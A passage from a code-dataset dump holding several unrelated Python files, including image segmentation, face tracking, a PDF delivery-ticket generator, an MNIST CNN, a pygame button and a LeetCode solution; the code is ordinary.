args.save_weights_path\n\tepoch_number = args.epoch_number\n\timages_path = args.test_images\n\toutput_path = args.output_path\n\tinput_height = args.input_height\n\tinput_width = args.input_width\n\tmodel_name = args.model_name\n\tn_classes = args.n_classes\n\t\n\tmodelFns = { 'vgg_segnet':Models.VGGSegnet.VGGSegnet , 'vgg_unet':Models.VGGUnet.VGGUnet , 'vgg_unet2':Models.VGGUnet.VGGUnet2 , 'fcn8':Models.FCN8.FCN8 , 'fcn32':Models.FCN32.FCN32 }\n\tmodelFN = modelFns[ model_name ]\n\n\tm = modelFN( n_classes , input_height=input_height, input_width=input_width )\n\tm.load_weights( args.save_weights_path + \".\" + str( epoch_number ) )\n\tm.compile(loss='categorical_crossentropy',\n\t optimizer= 'adadelta' ,\n\t metrics=['accuracy'])\n\n\n\toutput_height = m.outputHeight\n\toutput_width = m.outputWidth\n\n\timages = glob.glob( images_path + \"*.jpg\" ) + glob.glob( images_path + \"*.png\" ) + glob.glob( images_path + \"*.jpeg\" )\n\timages.sort()\n\n\tcolors = [ ( random.randint(0,255),random.randint(0,255),random.randint(0,255) ) for _ in range(n_classes) ]\n\n\t#for imgName in tqdm(images):\n\tfor imgName in images:\n\t\toutName = imgName.replace( images_path , args.output_path )\n\t\tX = LoadBatches.getImageArr(imgName , args.input_width , args.input_height )\n\t\tpr = m.predict( np.array([X]) )[0]\n\t\tpr = pr.reshape(( output_height , output_width , n_classes ) ).argmax( axis=2 )\n\t\tseg_img = np.zeros( ( output_height , output_width , 3 ) )\n\t\tfor c in range(n_classes):\n\t\t\tseg_img[:,:,0] += ( (pr[:,: ] == c )*( colors[c][0] )).astype('uint8')\n\t\t\tseg_img[:,:,1] += ((pr[:,: ] == c )*( colors[c][1] )).astype('uint8')\n\t\t\tseg_img[:,:,2] += ((pr[:,: ] == c )*( colors[c][2] )).astype('uint8')\n\t\tseg_img = cv2.resize(seg_img , (input_width , input_height ))\n\t\tcv2.imwrite( outName , seg_img )\n\n\nif __name__ == '__main__':\n\targv = sys.argv\n\targs = parse(argv[1:])\n\n\tpredict(args)","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467078778","text":"#object that uses camshift and/or viola jones to track face\n\nimport cv2 as cv\nimport faceGestureRecognitionV2\nfrom CamShiftObject import CamShiftObject\nimport threading\n\nclass FaceTracking:\n face = None\n leftabove = None\n rightunder = None\n cap = None\n\n # these are needed to find the angle under which the box is rotated\n headangle = None\n lefteyeangle = None\n righteyeangle = None\n\n # these are used to indicate f camshift is required, if the eye has been detected by viola_jones, then camshift is\n # unnecessary\n foundhead = False\n foundeyes = False\n\n cam_head = None\n cam_lefteye = None\n cam_righteye = None\n\n#for showing the squares\n rethead = None\n retlefteye = None\n retrighteye = None\n\n check_timer = False\n\n def __init__(self, i_cap):\n self.cap = i_cap\n while self.face is None:\n ret, frame = i_cap.read()\n faces = faceGestureRecognitionV2.getFaces(frame)\n cv.imshow('looking for face', frame)\n if len(faces) > 0:\n face = faces[0]\n cv.rectangle(frame, (face.startX, face.startY), (face.startX + face.width, face.startY + face.height),\n (255, 0, 0), 2)\n if face.leftEyeY:\n cv.rectangle(frame,(face.leftEyeX,face.leftEyeY),\n (face.leftEyeX+face.eyeWidth,face.leftEyeY+face.eyeHeight),\n (255,0,0),2)\n cv.imshow('looking for face', frame)\n if face.leftEyeX is not None and face.startX is not None:\n self.face = face\n self.headangle = 0\n self.rethead = ((face.startX + face.width/2, face.startY + face.height/2), (face.width, face.height), 0)\n self.cam_head = CamShiftObject(frame, face.startX, face.startY, face.width, face.height)\n\n self.lefteyeangle = 0\n self.cam_lefteye = CamShiftObject(frame, face.leftEyeX, face.leftEyeY, face.eyeWidth, face.eyeHeight)\n self.retlefteye = ((face.leftEyeX + face.eyeWidth / 2, face.leftEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n\n self.righteyeangle = 0\n self.retrighteye = ((face.rightEyeX + face.eyeWidth / 2, face.rightEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n self.cam_righteye = CamShiftObject(frame, face.rightEyeX, face.rightEyeY, face.eyeWidth, face.eyeHeight)\n\n self.timer()\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n def check_viola_jones(self, frame):\n foundFaces = faceGestureRecognitionV2.getFaces(frame)\n self.foundeyes = False\n self.foundhead = False\n if len(foundFaces) != 0:\n face = foundFaces[0]\n if face.startX is not None:\n # self.foundhead = True\n self.face.setHead(face.startX, face.startY, face.width, face.height)\n self.rethead = (\n (face.startX + face.width / 2, face.startY + face.height / 2), (face.width, face.height), 0)\n self.cam_head.roi_setup(frame, face.startX, face.startY, face.width, face.height)\n\n if face.leftEyeX is not None and face.startX is not None:\n self.face.setEyes(face.leftEyeX, face.leftEyeY, face.rightEyeX, face.rightEyeY, face.eyeWidth, face.eyeHeight)\n # self.foundeyes = True\n\n self.retlefteye = ((face.leftEyeX + face.eyeWidth / 2, face.leftEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n self.cam_lefteye.roi_setup(frame, face.leftEyeX, face.leftEyeY, face.eyeWidth, face.eyeHeight)\n\n self.retrighteye = ((face.rightEyeX + face.eyeWidth / 2, face.rightEyeY + face.eyeHeight / 2),\n (face.eyeWidth, face.eyeHeight), 0)\n\n def MeanShiftTracking(self, cam_tracker, frame):\n track_window = cam_tracker.track_window\n # set up the ROI for tracking\n roi_hist = cam_tracker.roi_hist\n term_crit = cam_tracker.term_crit\n\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n dst = cv.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n # apply meanshift to get the new location\n ret, track_window = cv.meanShift(dst, track_window, term_crit)\n\n return ret, track_window\n\n # def InitOpenCVTracking(self, CV_tracker, frame):\n\n\n def CamshiftTracking(self, cam_tracker, frame):\n track_window = cam_tracker.track_window\n # set up the ROI for tracking\n roi_hist = cam_tracker.roi_hist\n term_crit = cam_tracker.term_crit\n\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n dst = cv.calcBackProject([hsv],[0],roi_hist,[0,180],1)\n # apply meanshift to get the new location\n ret, track_window = cv.CamShift(dst, track_window, term_crit)\n\n return ret, track_window\n\n # def OpenCV_Tracking(self, cam_tracker, frame):\n\n\n def GetEyes(self):\n eye1 = self.cam_lefteye.roi\n eye2 = self.cam_righteye.roi\n return eye1, eye2\n\n def timer(self):\n self.check_timer = True\n threading.Timer(1, self.timer).start()\n\n def PerformFaceTracking(self):\n ret, frame = self.cap.read()\n if self.check_timer:\n self.check_viola_jones(frame)\n self.check_timer = False\n # self.foundeyes = False\n # self.foundhead = False\n else:\n # https://docs.opencv.org/3.4/db/df8/tutorial_py_meanshift.html\n if not self.foundhead:\n ret, track_window = self.MeanShiftTracking(self.cam_head, frame)\n # self.headangle = ret[2]\n # self.rethead = ret\n self.face.setHead(track_window[0], track_window[1], track_window[2], track_window[3])\n if not self.foundeyes:\n ret, track_window_left = self.MeanShiftTracking(self.cam_lefteye, frame)\n # self.lefteyeangle = ret[2]\n # self.retlefteye = ret\n\n ret, track_window_right = self.MeanShiftTracking(self.cam_righteye, frame)\n # self.righteyeangle = ret[2]\n # self.retrighteye = ret\n\n self.face.setEyes(track_window_left[0], track_window_left[1], track_window_right[0], track_window_right[1],\n track_window_right[2],\n track_window_right[3])","sub_path":"Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"215614199","text":"from reportlab.pdfgen import canvas\r\nfrom reportlab.lib.utils import ImageReader\r\nfrom reportlab.lib.units import mm\r\nfrom reportlab.lib.pagesizes import A4\r\nfrom django.conf import settings\r\nfrom django.db.models import Sum\r\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\r\nfrom batches.models import Drop, Recipe_Detail, Ingredient\r\nfrom django.db.models import Max, Sum, Avg, F\r\n\r\ndef createDocket(b):\r\n r = b.recipe\r\n\r\n # initialise canvas object for ticket\r\n filename = 'b' + str(b.batch_no).zfill(8) + '.pdf'\r\n filepath = settings.MEDIA_ROOT + '\\\\' + filename\r\n p = canvas.Canvas(filepath, pagesize=A4)\r\n pw, ph = A4\r\n p.setTitle('Delivery Ticket')\r\n p.setLineWidth(0.5)\r\n\r\n # margins setup\r\n marg = {'l':20, 'r':20, 't':10, 'b':10}\r\n w = pw-marg['l']-marg['r']\r\n h = ph-marg['t']-marg['b']\r\n p.translate(marg['l'], marg['b'])\r\n # p.setStrokeColorRGB(0.2,0.5,0.3)\r\n # p.setFillColorRGB(1, 1, 1)\r\n \r\n # draw title in top corner\r\n ct = cursor(p,w,h-14,size=14)\r\n ct.write('DELIVERY TICKET', align='r')\r\n\r\n # Name and Address\r\n\r\n ch = cursor(p,0,h-20,size=20)\r\n ch.write('FOGARTY CONCRETE')\r\n ch.size = 12; ch.newline();\r\n ch.listwrite([\r\n ['Gurrane, Templederry, Nenagh, Co. Tipperary'],\r\n ['Telephone: 0504-52151 Fax: 0504-52957'],\r\n ['Mobile: 087-2831415 (Andy), 086-3813399 (Plant)'],\r\n ['Email: andrewfogarty@eircom.net']\r\n ])\r\n\r\n c1 = cursor(p,0,0,size=12,font='Helvetica')\r\n c2 = cursor(p,0,0,size=12,ls=0.65,font='Courier')\r\n \r\n t1 = table(p,\r\n left=0,\r\n top=h-110,\r\n row_heights=[22, 150],\r\n col_widths=[w/2, w/2],\r\n )\r\n t1.place_cursor(c1,1,1);\r\n c1.write('Client')\r\n t1.place_cursor(c1,1,2);\r\n c1.write('Loading')\r\n t1.place_cursor(c2,2,1);\r\n c2.listwrite((\r\n ('Name:', str(b.client)),\r\n ('Delivery Address:', b.deliv_addr_1, b.deliv_addr_2, b.deliv_addr_3, b.deliv_addr_4, b.eircode)\r\n ))\r\n t1.place_cursor(c2,2,2);\r\n c2.listwrite((\r\n ('Date:', str(b.start_datetime().date())),\r\n ('Time of Loading:', str(b.end_datetime().time())),\r\n ('Driver:', b.driver.name),\r\n ('Truck Reg.:', b.truck.reg)\r\n ))\r\n\r\n t2 = table(p, \r\n left=t1.left,\r\n top=t1.bottom,\r\n row_heights=[22,80],\r\n col_widths=[w/6, w/6, w/2, w/6],\r\n bord_t=False,\r\n )\r\n t2.place_cursor(c1,1,1)\r\n c1.write('Batch No.')\r\n t2.place_cursor(c1,1,2)\r\n c1.write('Product Code')\r\n t2.place_cursor(c1,1,3)\r\n c1.write('Description')\r\n t2.place_cursor(c1,1,4)\r\n c1.write('Quantity')\r\n t2.place_cursor(c2,2,1)\r\n c2.write(str(b))\r\n t2.place_cursor(c2,2,2)\r\n c2.write(r.get_strength_class_display())\r\n t2.place_cursor(c2,2,3)\r\n c2.wrap_write(r.description,32)\r\n t2.place_cursor(c2,2,4)\r\n c2.write('%.1f m^3' % (b.volume))\r\n\r\n t3 = table(p, \r\n left=t2.left,\r\n top=t2.bottom,\r\n row_heights=[22,260],\r\n col_widths=[w/2,w/2],\r\n bord_t=False,\r\n )\r\n t3.place_cursor(c1,1,1)\r\n c1.write('Composition')\r\n t3.place_cursor(c1,1,2)\r\n c1.write('On Site')\r\n t3.place_cursor(c2,2,1)\r\n c2.listwrite((\r\n ('Admixtures:',) + tuple(r.admixtures_as_list()),\r\n ('Slump:', r.get_slump_class_display()),\r\n ('Max Agg Size (D):', '%i mm' % (r.aggregate_D())),\r\n ('Min. Cement Content:', '%.0f kg/m^3' % (r.total_cement())),\r\n ('Cement Type:', ', '.join(r.cement_types_as_list())),\r\n ('Max W/C Ratio:', '%.2f' % (r.wc_ratio())),\r\n ('Exposure Class:', ', '.join(r.exp_classes_as_list())),\r\n ('Cl Content Class:', r.get_cl_content_class_display()),\r\n ))\r\n c2.width = 0.96*w/2\r\n c2.ls = 1.2\r\n t3.place_cursor(c2,2,2)\r\n c2.listwrite((\r\n ('Time On Site:','-...'),\r\n ('Time Off Loaded:','-...'),\r\n ('Amount Conveyered:','-...'),\r\n ('Water Added (Supplier)','-...'),\r\n ('','-...'),\r\n ('Extra Water Added',''),\r\n ('at Customers Instruction:','-...'),\r\n ('','-...'),\r\n ('Estimated Slump:','-...'),\r\n ))\r\n \r\n t4 = table(p, \r\n left=t3.left,\r\n top=t3.bottom,\r\n row_heights=[22],\r\n col_widths=[w],\r\n bord_t=False,\r\n )\r\n t4.place_cursor(c1,1,1); c1.write('Customer')\r\n\r\n t5 = table(p, \r\n left=t4.left,\r\n top=t4.bottom,\r\n row_heights=[85,35],\r\n col_widths=[w/2],\r\n bord_t=False,\r\n )\r\n t5.place_cursor(c1,1,1)\r\n c1.listwrite([\r\n ['-Caution: Prolongled skin contact with'],\r\n ['wet concrete can result in cement burns'],\r\n ['-Where contact occurs wash thoroughly!'],\r\n ['-Material safety data sheet available upon request'],\r\n ])\r\n t5.place_cursor(c1,2,1,align='cl')\r\n c1.write('Conforms to EN-206-1: ');\r\n c1.write('Yes '); c1.checkbox(); c1.write(' No '); c1.checkbox()\r\n\r\n t6 = table(p, \r\n left=t5.right,\r\n top=t5.top,\r\n row_heights=[sum(t5.row_h)],\r\n col_widths=[w/2],\r\n bord_t=False,\r\n bord_l=False\r\n )\r\n t6.place_cursor(c1,1,1,align='tc')\r\n c1.width = 0.96*w/2\r\n c1.ls = 0.65\r\n c1.listwrite([\r\n ['Received in good order and condition'],\r\n ['Customer/Representative signature:'],\r\n ['...'],\r\n [''],\r\n ['...'],\r\n ], align='c')\r\n \r\n # draw logos on the page\r\n nsaiHeight = 25*mm\r\n nsaiWidth = nsaiHeight*167/237\r\n drawLogo(p,w-nsaiWidth,h-nsaiHeight-25,'nsai_logo.jpg',nsaiHeight,nsaiWidth)\r\n\r\n icfWidth = nsaiHeight*142/146\r\n drawLogo(p,w-nsaiWidth-icfWidth-15,h-nsaiHeight-25,'icf_logo.jpg',nsaiHeight,icfWidth)\r\n\r\n ceHeight = 10*mm\r\n ceWidth = ceHeight*500/350\r\n drawLogo(p,w-nsaiWidth-icfWidth-ceWidth-30,h-nsaiHeight-25,'ce_logo.jpg',ceHeight,ceWidth)\r\n\r\n # finish page, save and return filepath\r\n p.showPage()\r\n p.save()\r\n return filepath\r\n \r\ndef drawLogo(p,x,y,logo,height,width):\r\n logoHeight = height\r\n logoWidth = width\r\n img = ImageReader(settings.MEDIA_ROOT + '\\\\' + logo)\r\n p.drawImage(img, x, y, height=logoHeight, width=logoWidth)\r\n\r\nclass table:\r\n \"\"\"For drawing tables with borders and finding the coordinates to write inside\"\"\"\r\n \"\"\"(c) Joseph Thompson 2017\"\"\"\r\n\r\n def __init__(self, canvas, left, top, row_heights, col_widths, draw=True, bord_t=True, bord_b=True, bord_l=True, bord_r=True):\r\n self.c = canvas\r\n self.row_h = row_heights\r\n self.col_w = col_widths\r\n self.nrows = len(row_heights)\r\n self.ncols = len(col_widths)\r\n self.left = left\r\n self.top = top\r\n self.bottom = self.top-sum(self.row_h)\r\n self.right = self.left+sum(self.col_w)\r\n if draw == True:\r\n self.draw(bord_t, bord_b, bord_l, bord_r)\r\n\r\n def place_cursor(self, cur, row, col, font='Helvetica', gap=4, align='tl'):\r\n s = cur.size\r\n v_align = align[0];\r\n h_align = align[1];\r\n l = self.left + sum(self.col_w[0:col-1])\r\n r = self.left + sum(self.col_w[0:col])\r\n t = self.top - sum(self.row_h[0:row-1])\r\n b = self.top - sum(self.row_h[0:row])\r\n if h_align == 'c':\r\n cur.x = (l + r)/2\r\n elif h_align == 'r':\r\n cur.x = r - gap\r\n else:\r\n cur.x = l + gap\r\n if v_align == 'c':\r\n cur.y = (t + b - s)/2\r\n elif v_align == 'b':\r\n cur.y = b + gap\r\n else:\r\n cur.y = t - s - gap \r\n cur.reset()\r\n\r\n def draw(self, t=True, b=True, l=True, r=True):\r\n for i in range(t==False,self.nrows+(b==True)):\r\n self.c.line(self.left, self.top-sum(self.row_h[0:i]),\r\n self.right, self.top-sum(self.row_h[0:i]))\r\n for i in range(l==False,self.ncols+(r==True)):\r\n self.c.line(self.left+sum(self.col_w[0:i]), self.top,\r\n self.left+sum(self.col_w[0:i]), self.bottom)\r\n \r\nclass cursor:\r\n \"\"\"Simple cursor for writing text on canvas\"\"\"\r\n \"\"\"(c) Joseph Thompson 2017\"\"\"\r\n \r\n def __init__(self, canvas, start_x, start_y, font='Helvetica', size=12, ls=0.5, width=80):\r\n self.c = canvas\r\n self.x = start_x\r\n self.y = start_y\r\n self.font = font\r\n self.size = size\r\n self.ls = ls\r\n self.reset()\r\n self.width = width\r\n\r\n def reset(self):\r\n self.x_home = self.x\r\n self.y_home = self.y\r\n\r\n def wrap_write(self, text_string, max_length, align='l'):\r\n from textwrap import wrap\r\n lines = wrap(text_string, max_length, break_long_words=True)\r\n line_list = [[line] for line in lines]\r\n self.listwrite(line_list, align=align)\r\n \r\n def write(self,text_string,align='l'):\r\n def start_x(x,w,align):\r\n if align == 'r':\r\n return x-w\r\n elif align == 'c':\r\n return x-w/2\r\n else:\r\n return x \r\n self.c.setFont(self.font, self.size)\r\n s = self.size\r\n if text_string == '-...':\r\n w = self.width\r\n x = start_x(self.x,w,align)\r\n self.c.setDash(1,2)\r\n\r\n self.c.line(x, self.y-s/4.0,\r\n self.x_home+w, self.y-s/4.0)\r\n self.c.setDash(1)\r\n elif text_string == '...':\r\n w = self.width\r\n x = start_x(self.x,w,align)\r\n self.c.setDash(1,2)\r\n\r\n self.c.line(x, self.y-s/4.0,\r\n x+w, self.y-s/4.0)\r\n self.c.setDash(1) \r\n else:\r\n w = stringWidth(text_string, self.font, self.size)\r\n x = start_x(self.x,w,align)\r\n self.c.drawString(x, self.y, str(text_string))\r\n self.x = x + w \r\n\r\n def listwrite(self,string_list_list,align='l',key_font='Helvetica'):\r\n val_font = self.font\r\n for string_list in string_list_list:\r\n if len(string_list) == 0:\r\n self.newline() \r\n elif len(string_list) == 1:\r\n self.write(string_list[0], align=align)\r\n self.newline()\r\n else:\r\n self.font = key_font\r\n self.write(string_list[0], align=align)\r\n self.write(' ')\r\n self.font = val_font\r\n val_x = self.x\r\n for i in range(1,len(string_list)):\r\n self.x = val_x\r\n self.write(string_list[i], align=align)\r\n self.newline()\r\n\r\n def newline(self):\r\n self.x = self.x_home\r\n self.y += -(1+self.ls)*self.size\r\n\r\n def checkbox(self):\r\n s = self.size\r\n self.c.rect(self.x, self.y-s/4.0, s*1.25, s*1.25)\r\n self.x += s*1.25\r\n","sub_path":"batches/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"23460553","text":"import tensorflow as tf\nfrom tensorflow_core.examples.tutorials.mnist import input_data\n\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\ntf.reset_default_graph()\n\n# 1. data loading\nmnist = input_data.read_data_sets('../data/mnist/', one_hot=True)\n\n# 2. placeholder\nX = tf.placeholder(shape=[None, 784], dtype=tf.float32)\nY = tf.placeholder(shape=[None, 10], dtype=tf.float32)\n\n# convolution\n# conv layer 1\n# convolution image 처리 형태로 변환\nx_img = tf.reshape(X, [-1, 28, 28, 1])\nW1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev=0.01))\nL1 = tf.nn.conv2d(x_img, W1, strides=[1, 1, 1, 1], padding='SAME')\n\nL1 = tf.nn.relu(L1)\nL1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\nprint('L1 shape: {}'.format(L1.shape))\n\n# conv layer 2\nW2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01))\nL2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')\nL2 = tf.nn.relu(L2)\nL2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\nprint('L2 shape: {}'.format(L2.shape))\n\n# FC에 넣기 위해서 flatten 처리\nL2 = tf.reshape(L2, [-1, 7*7*64])\nprint('L2 shape: {}'.format(L2.shape))\n\n# FC (기존 neural network)\nkeep_prob = tf.placeholder(dtype=tf.float32)\n\n# Weight & bias\nW3 = tf.get_variable('weight3', shape=[7*7*64, 256], initializer=tf.contrib.layers.xavier_initializer())\nb1 = tf.Variable(tf.random_normal([256]), name='bias1')\n_layer1 = tf.nn.relu(tf.matmul(L2, W3) + b1)\nlayer1 = tf.nn.dropout(_layer1, keep_prob=keep_prob)\n\nW4 = tf.get_variable('weight4', shape=[256, 256], initializer=tf.contrib.layers.xavier_initializer())\nb2 = tf.Variable(tf.random_normal([256]), name='bias2')\n_layer2 = tf.nn.relu(tf.matmul(layer1, W4) + b2)\nlayer2 = tf.nn.dropout(_layer2, keep_prob=keep_prob)\n\nW5 = tf.get_variable('weight5', shape=[256, 10], initializer=tf.contrib.layers.xavier_initializer())\nb3 = tf.Variable(tf.random_normal([10]), name='bias3')\n\n# Hypothesis\nH = tf.matmul(layer2, W5) + b3\n\n# cost function\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=H, labels=Y))\n\n# train\ntrain = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n# session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# 학습\nnum_of_epoch = 5\nbatch_size = 100\n\nfor step in range(num_of_epoch):\n num_of_iter = int(mnist.train.num_examples / batch_size)\n avg_cost = 0\n for i in range(num_of_iter):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n _, cost_val = sess.run([train, cost], feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.7})\n avg_cost += cost_val / num_of_iter\n print('cost: {}'.format(avg_cost))\n\n# accuracy\npredict = tf.argmax(H, 1)\ncorrect = tf.equal(predict, tf.argmax(Y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct, dtype=tf.float32))\n\nprint('정확도: {}'.format(sess.run(accuracy, feed_dict={X: mnist.test.images, Y: mnist.test.labels, keep_prob: 1})))\n","sub_path":"Project10_Python/com.ai03_code/04_cnn/06_mnist_cnn.py","file_name":"06_mnist_cnn.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5581354","text":"import os\nimport tempfile\nimport unittest\nimport subprocess\n\n\nclass DeleteTest(unittest.TestCase):\n\n def setUp(self):\n self.current_dir = os.path.dirname(os.path.abspath(__file__))\n create_config_file_path = os.path.join(self.current_dir, 'assets', 'deletetest', 'create.yml')\n self.create_cmd = [\"./workbench\", \"--config\", create_config_file_path]\n\n self.temp_dir = tempfile.gettempdir()\n self.nid_file = os.path.join(self.temp_dir, 'workbenchdeletetesttnids.txt')\n\n nids = list()\n create_output = subprocess.check_output(self.create_cmd)\n create_output = create_output.decode().strip()\n create_lines = create_output.splitlines()\n with open(self.nid_file, \"a\") as fh:\n fh.write(\"node_id\\n\")\n for line in create_lines:\n if 'created at' in line:\n nid = line.rsplit('/', 1)[-1]\n nid = nid.strip('.')\n nids.append(nid)\n fh.write(nid + \"\\n\")\n\n def test_delete_check(self):\n delete_config_file_path = os.path.join(self.current_dir, 'assets', 'deletetest', 'delete.yml')\n delete_cmd = [\"./workbench\", \"--config\", delete_config_file_path]\n delete_output = subprocess.check_output(delete_cmd)\n delete_output = delete_output.decode().strip()\n delete_lines = delete_output.splitlines()\n\n self.assertEqual(len(delete_lines), 5)\n\n def tearDown(self):\n os.remove(self.nid_file)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/DeleteTest.py","file_name":"DeleteTest.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"513717795","text":"import pygame\n\nclass Button:\n\tdef __init__(self, x, y, w, h, label):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.w = w\n\t\tself.h = h\n\t\tself.label = label\n\t\tself.mouseOver = False\n\t\tself.buttonFont = pygame.font.Font(\"CyberpunkIsNotDead_ANR.ttf\", 12)\n\t\t\n\tdef draw(self, screen):\n\t\tif self.mouseOver:\n\t\t\tpygame.draw.rect(screen, 0x8080FF, (self.x, self.y, self.w, self.h))\n\t\telse:\n\t\t\tpygame.draw.rect(screen, 0x808080, (self.x, self.y, self.w, self.h))\n\t\ttextSurface = self.buttonFont.render(self.label, True, (255, 255, 255))\n\t\tscreen.blit(textSurface, ((self.w/2) - (textSurface.get_width()/2) + self.x, (self.h/2) - (textSurface.get_height()/2) + self.y))\n\t\t\n\tdef update(self, event):\n\t\tif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tif event.pos[0] >= self.x and event.pos[0] <= self.x + self.w and event.pos[1] >= self.y and event.pos[1] <= self.y + self.h:\n\t\t\t\tif self.label == \"Quit\":\n\t\t\t\t\tpygame.event.post(pygame.event.Event(pygame.QUIT))\n\t\t\t\telif self.label == \"Load Deck\":\n\t\t\t\t\tpygame.event.post(pygame.event.Event(EVENT_LOAD_DECK, {}))\t\t\t\t\t\n\t\telif event.type == pygame.MOUSEMOTION:\n\t\t\tif event.pos[0] >= self.x and event.pos[0] <= self.x + self.w and event.pos[1] >= self.y and event.pos[1] <= self.y + self.h:\n\t\t\t\tself.mouseOver = True\n\t\t\telse:\n\t\t\t\tself.mouseOver = False","sub_path":"Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"62198486","text":"#\n# @lc app=leetcode id=120 lang=python3\n#\n# [120] Triangle\n#\n# https://leetcode.com/problems/triangle/description/\n#\n# algorithms\n# Medium (42.22%)\n# Likes: 1653\n# Dislikes: 199\n# Total Accepted: 227.8K\n# Total Submissions: 534.1K\n# Testcase Example: '[[2],[3,4],[6,5,7],[4,1,8,3]]'\n#\n# Given a triangle, find the minimum path sum from top to bottom. Each step you\n# may move to adjacent numbers on the row below.\n# \n# For example, given the following triangle\n# \n# \n# [\n# ⁠ [2],\n# ⁠ [3,4],\n# ⁠ [6,5,7],\n# ⁠ [4,1,8,3]\n# ]\n# \n# \n# The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).\n# \n# Note:\n# \n# Bonus point if you are able to do this using only O(n) extra space, where n\n# is the total number of rows in the triangle.\n# \n#\n\n# @lc code=start\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n res = triangle[-1]\n h = len(triangle)\n for i in range(h-2,-1,-1):\n for j in range(0,i+1):\n res[j] = min(res[j],res[j+1]) +triangle[i][j]\n return res[0]\n \n# @lc code=end\n\n","sub_path":"120.triangle.py","file_name":"120.triangle.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"469114925","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom matplotlib.patches import Ellipse\n\nFILES = ['classificationA.train', 'classificationA.test',\n 'classificationB.train', 'classificationB.test',\n 'classificationC.train', 'classificationC.test']\n\nCONFIG = {'A': {'DS': 'A', 'TRAIN': FILES[0], 'TEST': FILES[1]},\n 'B': {'DS': 'B', 'TRAIN': FILES[2], 'TEST': FILES[3]},\n 'C': {'DS': 'C', 'TRAIN': FILES[4], 'TEST': FILES[5]}}\n\nCONFIG = CONFIG['C'] # Set to config A\nSTOPPING = 0.001 # stopping criterion for IRLS\n\n\ntest = tf.placeholder(dtype=tf.float32, shape=[None, 3,])\ntrain = tf.placeholder(dtype=tf.float32, shape=[None, 3,])\npi_mle = tf.Variable(initial_value=0, dtype=tf.float32)\nmu_0_mle = tf.Variable(initial_value=[0,0], dtype=tf.float32)\nmu_1_mle = tf.Variable(initial_value=[0,0], dtype=tf.float32)\nsigma_mle = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\nsigma_mle_1 = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\nsigma_mle_2 = tf.Variable(initial_value=[[0,0], [0,0]], dtype=tf.float32)\n\n# Compute pi MLE for MoG\npi_mle = pi_mle.assign(tf.reduce_mean(train, axis=0)[2])\n\n# Compute mu MLE for MoG\ngroup_1 = tf.squeeze(tf.gather(train[:,0:2], indices=tf.where(condition=tf.equal(train[:, 2],0))))\nmu_0_mle = mu_0_mle.assign(tf.reduce_mean(group_1, axis=0))\n\ngroup_2 = tf.squeeze(tf.gather(train[:,0:2], indices=tf.where(condition=tf.equal(train[:, 2],1))))\nmu_1_mle = mu_1_mle.assign(tf.reduce_mean(group_2, axis=0))\n\n# Compute Sigma MLE for MoG\nsize_1 = tf.cast(tf.shape(group_1)[0], tf.float32)\nsigma_mle_1 = sigma_mle_1.assign(tf.matmul(tf.transpose(group_1), group_1)/size_1)\nsigma_mle_1 -= [[mu_0_mle[0]**2, mu_0_mle[0]*mu_0_mle[1]],\n [mu_0_mle[0]*mu_0_mle[1], mu_0_mle[1]**2]]\nsize_2 = tf.cast(tf.shape(group_2)[0], tf.float32)\nsigma_mle_2 = sigma_mle_2.assign(tf.matmul(tf.transpose(group_2), group_2)/size_2)\nsigma_mle_2 -= [[mu_1_mle[0]**2, mu_1_mle[0]*mu_1_mle[1]],\n [mu_1_mle[0]*mu_1_mle[1], mu_1_mle[1]**2]]\nsigma_mle = sigma_mle.assign((size_1/(size_1+size_2))*sigma_mle_1 + (size_1/(size_1+size_2))*sigma_mle_2)\n\n# Logistic Regression 